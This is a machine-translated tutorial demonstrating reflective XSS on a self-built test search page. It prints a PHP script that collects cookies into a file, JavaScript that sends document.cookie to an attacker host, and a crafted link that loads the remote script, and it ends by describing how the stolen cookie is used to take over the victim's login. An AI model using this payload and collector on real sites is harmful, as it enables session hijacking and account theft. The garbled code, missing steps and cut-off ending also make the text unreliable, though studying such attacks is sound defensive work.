Practical demonstration of reflective xss

We know that XSS attacks are divided into three types: Persistent, Non-persistent, and Dom-based. The reflection type is the most commonly used and the most widely used attack method. It sends a URL with malicious script code parameters to others. When the URL address is opened, the unique malicious code parameters are parsed and executed by HTML. This feature is non-persistent. You must click a link with a specific parameter.

Today, we will give you a practical demonstration of a reflective xss to learn more about this attack method.

 
Preparations:

(1) login), a login cgi (login. php), and a search cgi (search. php ). The interface is as follows:

Because xss vulnerabilities generally occur in the interaction with users, the search box is our focus.

(2) our own hacker website (another virtual site hacker.qq.com ). There is a hack. php under the domain name to collect users' cookies, and a hacker. js is used to send requests to hack. php.

 

Vulnerability discovered

First, we need to find out where the xss vulnerability of the site occurs. As mentioned above, the interaction with users is our main focus .. Now, we can enter a few characters "computer" at will and click "Search:

The search interface is as follows (this is a simple search interface written by myself ):

Here we found that the characters we entered appeared on the search interface (many e-commerce websites should be in this interface form ).. Okay. Here we enter some special characters to try "<script> alert (1) </script>" and click "Search:

A small pop-up window appears, it seems that search. php does not process the keywords entered by the user, and then directly outputs them to the interface. Since the xss vulnerability exists, you can start to launch attacks, this attack aims to steal users' cookies.

Attack

First, let's write our own phone cookie CGI (hack. php). The Code is as follows:

1. <? Php
2. $ Cookie = $ _ GET ['q'];
3. Var_dump ($ cookie );
4. $ MyFile = "cookie.txt ";
5. File_put_contents ($ myFile, $ cookie );
6. ?>

<?php $cookie = $_GET['q'];var_dump($cookie);$myFile = "cookie.txt";file_put_contents($myFile, $cookie);?>

Then write the hacker. js that sends the request. The Code is as follows:

 

Var img = new Image ();
Img. src = "http://hacker.qq.com/hack.php? Q = "+ document. cookie;
Document. body. append (img );

 

Okay. Now we can construct a connection to fool the user:

<A href = "http://xsstest.qq.com/search.php? Q = % 3 Cscript + src % 3 Dhttp % 3A % 2F % 2Fhacker.qq.com % 2Fhacker. js % 3E % 3C % 2 Fscript % 3E & commend = all & ssid = s5-e & search_type = item & atype = & filterFineness = & rr = 1 & pcat = food2011 & style = grid & cat = "> click to send 998 </a>

 

View search. q Parameter after php, after decoding, the actual function of <script src = "http://hacker.qq.com/hacker.js"> </script> is to simulate the user to enter <script src = "http://hacker.qq.com/hacker.js"> </script> in the search box and click Search. Search. php directly enters it into the page without processing, so that it has new semantics in the html document. It loads haker. js in the hacker.qq.com domain.

Open the hosts file:

 

It is found that all accounts and passwords used for login are included, and the passwords are encrypted .. OK. Now we can use this cookie to obtain the user's login status.

The entire attack process ends.

 

Of course, in the real process, few websites have such obvious xss vulnerabilities .. Here, we just demonstrated the principles of the reflective xss. Although there are many vulnerabilities in reality, they are essentially unchanged .. You can further study